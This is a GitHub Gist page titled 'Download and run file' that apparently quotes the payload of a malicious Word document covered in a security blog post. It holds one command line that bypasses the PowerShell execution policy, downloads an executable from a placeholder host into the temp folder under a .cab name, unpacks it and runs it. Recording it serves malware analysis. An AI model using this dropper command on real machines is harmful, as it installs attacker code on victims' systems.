Created
April 8, 2015 12:26
-
-
Save jonaslejon/18c5d308e5f7d526a708 to your computer and use it in GitHub Desktop.
Download and run file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('https://x.x.x.x/file.exe','%TEMP%\\31231231.cab'); expand %TEMP%\31231231.cab %TEMP%\31231231.exe; start %TEMP%\31231231.exe; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Source: http://blog.rootshell.be/2015/04/07/malicious-ms-word-document-not-detected-by-av-software/